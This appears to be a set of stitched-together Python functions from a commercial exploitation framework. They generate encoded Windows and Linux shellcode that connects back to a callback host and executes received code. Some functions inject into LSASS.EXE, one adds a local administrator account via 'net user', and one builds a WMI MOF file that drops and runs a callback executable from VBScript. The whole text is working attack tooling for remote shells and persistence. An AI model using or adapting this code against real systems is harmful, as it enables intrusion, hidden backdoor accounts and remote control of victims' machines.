def createShellcode(self):
#self.shellcode="\xcc"*400
#return 1
host=self.callback.ip
port=self.callback.port
import shellcodeGenerator
sc=shellcodeGenerator.win32()
#no gocode - too big
#sc.addAttr("GOFindSock",None)
#sc.addAttr("LoadRegAsFD", {"reg" : "esi"})
#sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("tcpconnect",{"port":port,"ipaddress":host})
sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("UseWS2Ordinal",None)
rawshellcode=sc.get()
import xorencoder
enc=xorencoder.simpleXOR()
enc.subesp=5000
enc.setbadstring(self.badstring)
ret=enc.find_key(rawshellcode)
if ret==0:
self.log("Could not generate key for this shellcode!")
raise Exception, "No shellcode generated"
self.shellcode=enc.encode(rawshellcode)
if self.shellcode=="":
raise Exception, "No shellcode generated"
self.log("Xor key used: %x"%enc.getkey())
self.log("Length of shellcode=%s"%len(self.shellcode))
return ret
def createShellcode(self):
sc = shellcodeGenerator.win32()
#sc.addAttr("revert_to_self_before_importing_ws2_32",None)
sc.addAttr("unhandled_exception_filter", None)
#sc.addAttr("debugme", None)
sc.addAttr("GOFindSock", None)
sc.addAttr("RecvExecWin32", None)
#sc.addAttr("LoadRegAsFD", {"reg" : "esi"})
#sc.addAttr("tcpconnect",{"port":localport,"ipaddress":localhost})
#sc.addAttr("initstackswap",None)
#sc.addAttr("stackSwap",None)
raw = sc.get()
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
#tag it for the searcher
self.shellcode = "AAAAAAAA\xeb\x08" + self.tag2 + self.tag1 + encoder.encode(
raw)
#now do search shellcode
raw = win32shell.getsearchcode(self.tag1, self.tag2)
self.log("Doing printable encoding - takes some time...")
encoder = printable.intelprintableencoder()
encoder.setESPMod(
3700) #put this large enough that esp points at least 200
#bytes below your shellcode
encoder.setbadchars(self.searchbadstring)
data = encoder.encode(raw)
self.encodedsearchcode = data
#print "%d: length=%d (from %d) Data=%s"%(isprint(data),len(data),len(raw),data)
self.log("Done with printable encoding")
return
def createShellcode(self):
#sc = shellcodeGenerator.win32()
#sc.addAttr("findeipnoesp", None)
#sc.addAttr("MessageBeep", None)
#sc.addAttr("MessageBox", ["HELLO"])
#sc = sc.get()
sc = shellcodeGenerator.win32()
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
sc.addAttr('SmallRecvExecWin32', {'socketreg': 'FDSPOT'})
sc.addAttr('UseWS2Ordinal', None)
sc = sc.get()
print "XXX: pre-encoding %d" % len(sc)
encoder = alphanumeric.AlphaNum()
totopc = encoder.seh_pc() # leaves pc in ecx
getpc = encoder.get_pc(reg='ecx')
payload = encoder.encode(sc)
self.shellcode = totopc + getpc + payload
print self.shellcode
print "XXX: post-encoding %d" % len(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
return self.shellcode
def createShellcode(self):
#localhost=self.callback.ip
#localport=self.callback.port
sc = shellcodeGenerator.win32()
#sc.addAttr("ForkLoad", None)
# the to fork code
sc.addAttr("findeipnoesp",
{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("isapiGOFindSock", None)
sc.addAttr("ExitThread", None)
#set up the shellcode
self.shellcode = sc.get()
self.log("Size of raw shellcode is %d" % len(self.shellcode))
encoder = chunkedaddencoder.intelchunkedaddencoder()
#these are the characters not allowed by the exploit
encoder.setbadstring(self.badstring)
self.log(
"Encoding shellcode. This may take a while if we don't find a good value in the cache."
)
shellcode = encoder.encode(self.shellcode)
self.log("Done encoding shellcode.")
if shellcode == "":
self.log("Could not encode shellcode")
return 0
#debug int
#shellcode="\xcc"+shellcode
self.setShellcode(shellcode)
self.log("Size of encoded shellcode is %d" % len(self.shellcode))
return 1
def createShellcode(self):
import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
sc.addAttr('CreateThreadRecvExecWin32',
{'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
rawshellcode = sc.get()
import xorencoder
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret = encoder.find_key(rawshellcode)
if ret == 0:
self.log('Could not find a key for this shellcode!')
raise Exception, 'No shellcode generated'
self.shellcode = encoder.encode(rawshellcode)
if self.shellcode == '':
raise Exception, 'No shellcode generated'
self.log('Xor key used: %x' % (encoder.getkey()))
self.log('Length of shellcode=%s' % (len(self.shellcode)))
return self.shellcode
def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
if self.version == 0:
self.localhost = localhost
self.localport = localport
return ""
if self.versions[self.version][0].count("Windows"):
sc = shellcodeGenerator.win32()
#sc.addAttr("ForkLoad", None)
# the to fork code
#sc.addAttr("revert_to_self_before_importing_ws2_32", None)
#sc.addAttr("unhandled_exception_filter",None)
self.log("Generating shellcode with port %s and ip %s" %
(localport, localhost))
sc.addAttr("tcpconnect", {
"port": localport,
"ipaddress": localhost
})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
self.shellcode = sc.get()
self.log("Raw win32 shellcode length: %d" % len(self.shellcode))
#return self.createWin32Shellcode(self.badstring,localhost,localport)
elif self.versions[self.version][0].count("Linux"):
#self.shellcode="\xcc"*500
myshellcode = shellcodeGenerator.linux_X86()
if localport == 0:
self.log("Why is port zero?")
return ""
myshellcode.addAttr("connect", {
"ipaddress": localhost,
"port": localport
})
myshellcode.addAttr("read_and_exec", {"fdreg": "esi"})
self.shellcode = myshellcode.get()
else:
self.log("Cannot yet create shellcode for version %d" %
self.version)
return ""
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
#self.shellcode = "\xcc"+self.shellcode
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
self.log("Shellcode length: %d" % len(self.shellcode))
if len(self.shellcode) > 1020:
self.log(
"Warning shellcode is %d bytes - longer than the 1020 available..."
% (len(self.shellcode)))
return self.shellcode
def createShellcode(self):
import shellcodeGenerator
port = self.callback.port
host = self.callback.ip
sc = shellcodeGenerator.win32()
sc.addAttr('tcpconnect', {'port': port, 'ipaddress': host})
sc.addAttr('SmallRecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('UseWS2Ordinal', None)
self.shellcode = sc.get()
return self.shellcode
def createShellcode(self):
sc=shellcodeGenerator.win32()
sc.addAttr('findeipnoesp',{'subespval':0}) #don't mess with eip
sc.addAttr('revert_to_self_before_importing_ws2_32',None)
sc.addAttr('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip})
sc.addAttr('loadFDasreg',{'reg':'esi'})
sc.addAttr('RecvExecDepSafe',None)
sc.addAttr('ExitThread',None)
self.callback.argsDict['fromcreatethread']=0
self.shellcode=sc.get()
return self.shellcode
def createShellcode(self):
sc = shellcodeGenerator.win32()
sc.addAttr('SearchCodeSafeSEH', {'tag': 0x6b303063}) #'c00k'
sc.standalone = 1
rawshellcode = sc.get()
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
encoder.find_key(rawshellcode)
self.searchcode = encoder.encode(rawshellcode)
#print len(self.searchcode),repr(self.searchcode)
self.createWin32Shellcode('', self.callback.ip, self.callback.port)
return self.shellcode
def gocode_createShellcode(self):
sc = shellcodeGenerator.win32()
sc.addAttr("GOFindSock", {"setblocking": 1})
sc.addAttr("RecvExecWin32", None)
self.shellcode = sc.get()
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
return self.shellcode
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
sc = shellcodeGenerator.win32()
# we want to get a single clean instance
sc.standalone = 1
sc.addAttr("ASN1Stage0", None)
self.shellcode = sc.get()
# we need the localhost and localport in stage2
# this is called from GUI with our localhost and port as args
self.localhost = host
self.localport = port
self.log("Stage one payload is %d bytes" % len(self.shellcode))
return self.shellcode
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
if host == '0.0.0.0':
sc.addAttr('BindMosdef', {'port': port})
else:
sc.addAttr('tcpconnect', {'port': port, 'ipaddress': host})
sc.addAttr('RecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
self.shellcode = sc.get()
return self.shellcode
def createStageTwoShellcode(self):
s2sc = shellcodeGenerator.win32()
# our fd is in esi
# save the register before the import loops
s2sc.addAttr("findeip", {"savereg": "esi"})
# restore the register and load it to FDSPOT
# which is used by initstackswap and stackswap
s2sc.addAttr("LoadSavedRegAsFD", {"reg": "esi"})
self.log("Creating stage two payload")
s2sc.addAttr("initstackswap", None)
s2sc.addAttr("stackSwap", None)
self.stagetwo = s2sc.get()
if self.stagetwo == "":
self.log("Problem building stage two payload")
return 0
return self.stagetwo
def sc_mkwin32canvas(localaddr,badstring,subesp=0):
import sys
sys.path.append("shellcode")
import shellcodeGenerator
from canvasexploit import canvasexploit
sc=shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",{"subespval": 0x400}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
#sc.addAttr("BindMosdef", {"port" : 12331 })
sc.addAttr("tcpconnect", {"port" : localaddr[1], "ipaddress" : localaddr[0]})
sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread",None)
return canvasexploit().intel_encode(badstring,sc.get())
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
self.remoteport = port
sc = shellcodeGenerator.win32()
sc.addAttr("tcpconnect", {"port": port, "ipaddress": host})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
#sc.addAttr("initstackswap", None)
#sc.addAttr("stackSwap", None)
self.shellcode = sc.get()
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
return self.shellcode
def createShellcode(self):
#host=self.callback.ip
#port=self.callback.port
sc = shellcodeGenerator.win32()
"""
we set the GOcode search range to start at 0x180 so we dont
tread on low range pipes that seem to hate getpeername
"""
sc.addAttr("GOFindSock", None)
sc.addAttr("RecvExecWin32", None)
self.shellcode = sc.get()
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.raiseError("Problem encoding shellcode")
self.log("Shellcode len: %d"% len(self.shellcode))
return self.shellcode
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
self.localhost = host
self.localport = port
sc = shellcodeGenerator.win32()
shellcode = self.createHeapSafeInjectIntoProcess(
self.badstring, host, port, smallcode=0, processname="LSASS.EXE")
import mosdef
# GET EIP, MOV "ret", -0x10(%eip)
selfmodify = "\xe8\xff\xff\xff\xff\xc3\x5f" + mosdef.assemble(
"movl $0x4141feeb, -0x10(%edi)", "X86")
self.shellcode = "\x42" * 0x50 + selfmodify + shellcode
self.log("length of real shellcode: %d" % (len(self.shellcode)))
return self.shellcode
def createShellcode(self):
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
mosdef_type = self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL)
mosdef_id = self.engine.getNewMosdefID(self)
sc.addAttr("send_universal", {
"mosdef_type": mosdef_type,
"mosdef_id": mosdef_id
})
sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'})
sc.vAllocSelf = True
self.shellcode = sc.get()
logging.info("Shellcode size: %d" % len(self.shellcode))
return self.shellcode
def messagebox_createShellcode(self):
"""
This createShellcode displays a message when
the exploit is successful
"""
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", None)
sc.addAttr("MessageBeep", None)
sc.addAttr("MessageBox", ["HELLO"])
#sc.addAttr("MessageBox", ["HOW ARE YOU?"])
#sc.addAttr("ExitProcess", None)
self.shellcode = sc.get()
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
return self.shellcode
def createStageTwoShellcode(self):
host = self.callback.ip
port = self.callback.port
self.log("Creating stage two payload")
sc = shellcodeGenerator.win32()
# using a custom findeip that keeps using current esp
sc.foundeip = 1
sc.addAttr("CreateThreadFindeip", None)
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": port, "ipaddress": host})
#sc.addAttr("initstackswap", None)
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
#sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
#sc.addAttr("stackSwap", None)
sc.addAttr("ExitThread", None)
raw = sc.get()
self.stagetwo = raw
self.log("Stage two payload is %d bytes" % len(self.stagetwo))
return self.stagetwo
def createShellcode(self):
if self.version == 3:
import shellcode.clean.windows.payloads as payloads
p = payloads.payloads()
sc = p.win32_exec(
"cmd.exe /c net user c c /ADD && net localgroup administrators c /ADD"
)
rawshellcode = p.assemble(sc)
else:
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': self.subesp})
if self.version == 1:
sc.addAttr('Fix RtlEnterCriticalSection', {'SimpleFix': 1})
if self.callback.ip == '0.0.0.0':
sc.addAttr('BindMosdef', {'port': self.callback.port})
else:
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
sc.addAttr('RecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
rawshellcode = sc.get()
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret = encoder.find_key(rawshellcode)
if ret == 0:
self.log('Could not find a key for this shellcode!')
raise Exception, 'No shellcode generated'
self.shellcode = encoder.encode(rawshellcode)
if self.shellcode == '':
raise Exception, 'No shellcode generated'
self.log('Xor key used: %x' % (encoder.getkey()))
self.log('Length of shellcode=%s' % (len(self.shellcode)))
self.shellcode = '\x90' * (487 - len(self.shellcode)) + self.shellcode
return self.shellcode
def createShellcode(self):
# if -l -d is set, switch to bind mode !!!
sc = shellcodeGenerator.win32()
if self.callback and self.callback.ip == "0.0.0.0": # switching to BindMosdef mode
sc.foundeip = 1
# Icecast specific
sc.addAttr("CreateThreadFindeip", None)
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
# end of Icecast specific
sc.addAttr("BindMosdef", {"port": self.callback.port})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"})
else:
sc.foundeip = 1
sc.addAttr("CreateThreadFindeip", None)
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("GOFindSock", None)
sc.addAttr("RecvExecWin32", None)
self.shellcode = sc.get()
if len(self.shellcode) < 824:
self.shellcode = "A" * (824 - len(self.shellcode)) + self.shellcode
print "[!] size: %d" % len(self.shellcode)
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
return self.shellcode
def generateMOF(self):
sc=shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval':0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {'port': self.callback.port,
'ipaddress':self.callback.ip})
mosdef_type=self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL)
mosdef_id=self.engine.getNewMosdefID(self)
self.log("Creating MOSDEF ID: %d"%mosdef_id)
sc.addAttr('send_universal',{'mosdef_type': mosdef_type,'mosdef_id':mosdef_id})
sc.addAttr('RecvExecDepSafe',{'socketreg':'FDSPOT'})
sc.addAttr('ExitProcess',None)
sc.vAllocSelf=True
callback_payload=sc.get()
myPElib=pelib.PElib()
binary=myPElib.createPEFileBuf(callback_payload)
vbs=''
for i in range(0,len(binary),8):
vbs+='"binary = binary & \\"'
for j in range(8):
if (i+j)>=len(binary):
break
vbs+='%02x'%(ord(binary[i+j]))
if (i+j)!=len(binary)-1:
vbs+=','
vbs+='\\"\\n"\n'
vbs+='"tmp = Split(binary, \\",\\")\\n"\n'
vbs+='"Set fso = CreateObject(\\"Scripting.FileSystemObject\\")\\n"\n'
vbs+='"Set shell = CreateObject(\\"WScript.Shell\\")\\n"\n'
vbs+='"userprofile = shell.ExpandEnvironmentStrings(\\"%USERPROFILE%\\")\\n"\n'
vbs+='"path = userprofile & \\"\\\\\\" & \\"cb%d.exe\\"\\n"\n'%(random.randint(1,99))
vbs+='"Set f = fso.CreateTextFile(path, True)\\n"\n'
vbs+='"For i = 0 To UBound(tmp)\\n"\n'
vbs+='" b = Int(\\"&H\\" & tmp(i))\\n"\n'
vbs+='" f.Write Chr(b)\\n"\n'
vbs+='"Next\\n"\n'
vbs+='"f.Close\\n"\n'
vbs+='"shell.Run Chr(34) & path & Chr(34), 7, false\\n"'
mof="""#pragma namespace ("\\\\\\\\.\\\\root\\\\subscription")
#pragma deleteclass("MyASEventConsumer", nofail)
#pragma deleteinstance("__EventFilter.Name=\\\"EF\\\"", nofail)
#pragma deleteinstance("ActiveScriptEventConsumer.Name=\\\"ASEC\\\"", nofail)
class MyASEventConsumer
{
[key]string Name;
};
instance of ActiveScriptEventConsumer as $CONSUMER
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptText =
SCRIPT;
};
instance of __EventFilter as $FILTER
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Name = "EF";
Query = "SELECT * FROM __InstanceCreationEvent"
" WHERE TargetInstance.__class = \\"MyASEventConsumer\\"";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding as $BINDING
{
CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
Filter = $FILTER;
Consumer = $CONSUMER;
};
instance of MyASEventConsumer
{
Name = "Trigger";
};
""".replace('SCRIPT',vbs)
#print mof
return mof
